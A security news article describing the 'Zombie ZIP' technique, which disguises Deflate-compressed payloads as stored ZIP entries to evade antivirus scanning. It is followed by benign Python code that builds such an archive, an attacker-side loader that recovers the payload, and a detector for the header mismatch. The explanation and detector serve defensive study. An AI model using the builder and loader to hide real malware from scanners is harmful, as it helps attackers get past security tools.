Malformed Archive Technique Evades Security Detection

A newly developed method called "Zombie ZIP" allows malicious payloads to remain undetected by manipulating ZIP file headers to deceive security tools. The technique sets the compression method field to 0 (stored, meaning uncompressed) on entry data that is actually Deflate-compressed, so antivirus and endpoint detection systems that trust the header scan the raw Deflate bytes as if they were the file's contents and see only noise rather than the actual malicious code. Standard extraction utilities such as WinRAR and 7-Zip, which also trust the header, report errors or produce corrupted data when opening these crafted archives.

Security researcher Chris Aziz demonstrated that this approach evaded detection by 50 out of 51 antivirus engines on VirusTotal. The deception relies on security products trusting the ZIP method field, which claims Method=0 (stored), while the archive actually contains Deflate-compressed payloads. A purpose-built loader that ignores the method field and inflates the data anyway can decompress and recover the hidden malware.

The proof-of-concept published on GitHub sets each entry's CRC-32 to the checksum of the decompressed payload rather than of the bytes actually present in the archive, so a tool that honours Method=0 extracts the raw Deflate bytes, fails its CRC check and aborts, while a loader that inflates the data first obtains a matching checksum. CERT/CC issued a warning about CVE-2026-0866, noting similarities to a two-decade-old vulnerability affecting early ESET products. CERT/CC recommends that security vendors validate the declared compression method against the actual entry data and flag inconsistencies between the two. Users are advised to treat archive files from unknown sources with extreme caution and to delete any that produce "unsupported method" errors during extraction.
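As an added worked example (this is not the researcher's GitHub proof-of-concept, which the article does not reproduce, and it carries no malware), the following Python builds a benign one-entry archive the way the article describes: Method=0 in both the local and central headers, a raw Deflate stream as the entry data, and CRC-32 and uncompressed size taken from the real payload. It then shows the three behaviours the article contrasts: what a method-trusting tool hands to its scanner, how the standard library's `zipfile` fails the CRC check, how a loader that inflates regardless recovers the payload, and finally the consistency check CERT/CC recommends. The payload text, the filename `note.txt` and all function names are constructed for this illustration.

```python
import io
import struct
import zipfile
import zlib

# Constructed, benign stand-in for the hidden payload (not malware).
PAYLOAD = b"hello from inside the zombie zip\n" * 40
NAME = "note.txt"

LOCAL_FMT = "<IHHHHHIIIHH"          # local file header, 30 bytes fixed part
CENTRAL_FMT = "<IHHHHHHIIIHHHHHII"  # central directory header, 46 bytes
EOCD_FMT = "<IHHHHIIH"              # end of central directory, 22 bytes

def crc32(b: bytes) -> int:
    return zlib.crc32(b) & 0xFFFFFFFF

def build_zombie_zip(payload: bytes, name: str) -> bytes:
    """Single-entry ZIP whose headers claim Method=0 (stored) while the entry
    bytes are a raw Deflate stream. CRC-32 and uncompressed size describe the
    real payload, so only a loader that inflates anyway gets a CRC match."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw deflate, no zlib wrapper
    deflated = c.compress(payload) + c.flush()
    n, method = name.encode(), 0                  # method 0 is the lie
    local = struct.pack(LOCAL_FMT, 0x04034B50, 20, 0, method, 0, 0x21,
                        crc32(payload), len(deflated), len(payload), len(n), 0) + n
    central = struct.pack(CENTRAL_FMT, 0x02014B50, 20, 20, 0, method, 0, 0x21,
                          crc32(payload), len(deflated), len(payload),
                          len(n), 0, 0, 0, 0, 0, 0) + n   # local header at offset 0
    eocd = struct.pack(EOCD_FMT, 0x06054B50, 0, 0, 1, 1, len(central),
                       len(local) + len(deflated), 0)
    return local + deflated + central + eocd

def build_honest_zip(payload: bytes, name: str) -> bytes:
    """Control case: a genuinely stored entry written by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()

def local_entries(data: bytes):
    """Walk local file headers; yields (name, method, crc, usize, entry_bytes).
    Assumes no data descriptors (general-purpose flag bit 3 clear)."""
    pos = 0
    while data[pos:pos + 4] == b"PK\x03\x04":
        (_, _, _, method, _, _, crc, csize, usize,
         nlen, xlen) = struct.unpack_from(LOCAL_FMT, data, pos)
        name = data[pos + 30:pos + 30 + nlen].decode()
        start = pos + 30 + nlen + xlen
        yield name, method, crc, usize, data[start:start + csize]
        pos = start + csize

def inflate_raw(blob: bytes):
    """Raw-inflate the bytes; None unless a complete stream decodes cleanly."""
    d = zlib.decompressobj(-15)
    try:
        out = d.decompress(blob) + d.flush()
    except zlib.error:
        return None
    return out if d.eof else None

def scanner_view(data: bytes) -> bytes:
    """What a tool that trusts Method=0 hands to its signature engine."""
    return next(local_entries(data))[4]

def standard_extract(data: bytes, name: str):
    """zipfile honours Method=0, then fails its CRC check on a zombie entry."""
    try:
        return ("ok", zipfile.ZipFile(io.BytesIO(data)).read(name))
    except zipfile.BadZipFile as e:
        return ("error", str(e))

def zombie_loader(data: bytes) -> bytes:
    """The attacker's side: ignore the method field and inflate regardless."""
    _, _, crc, _, blob = next(local_entries(data))
    out = inflate_raw(blob)
    if out is None or crc32(out) != crc:
        raise ValueError("not a zombie entry")
    return out

def check_archive(data: bytes):
    """CERT/CC's advice as code: for every entry claiming Method=0, verify the
    stored bytes against CRC and size; if they fail, test whether the bytes are
    really a Deflate stream whose output matches the header instead."""
    findings = []
    for name, method, crc, usize, blob in local_entries(data):
        if method != 0:
            continue
        if crc32(blob) == crc and len(blob) == usize:
            findings.append((name, "consistent"))
            continue
        out = inflate_raw(blob)
        if out is not None and crc32(out) == crc and len(out) == usize:
            findings.append((name, "zombie: method=stored but data is deflate"))
        else:
            findings.append((name, "crc/size mismatch"))
    return findings

ZOMBIE = build_zombie_zip(PAYLOAD, NAME)
HONEST = build_honest_zip(PAYLOAD, NAME)
```

Running `check_archive(ZOMBIE)` reports the zombie entry while `check_archive(HONEST)` reports it consistent, and `standard_extract(ZOMBIE, NAME)` returns an error where `zombie_loader(ZOMBIE)` returns the payload. Two caveats for anyone turning this into a real detection: the walker trusts the local headers and assumes no data descriptors, and it does not compare the local header with the central directory entry, which can disagree and is a second place a crafted archive can lie.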
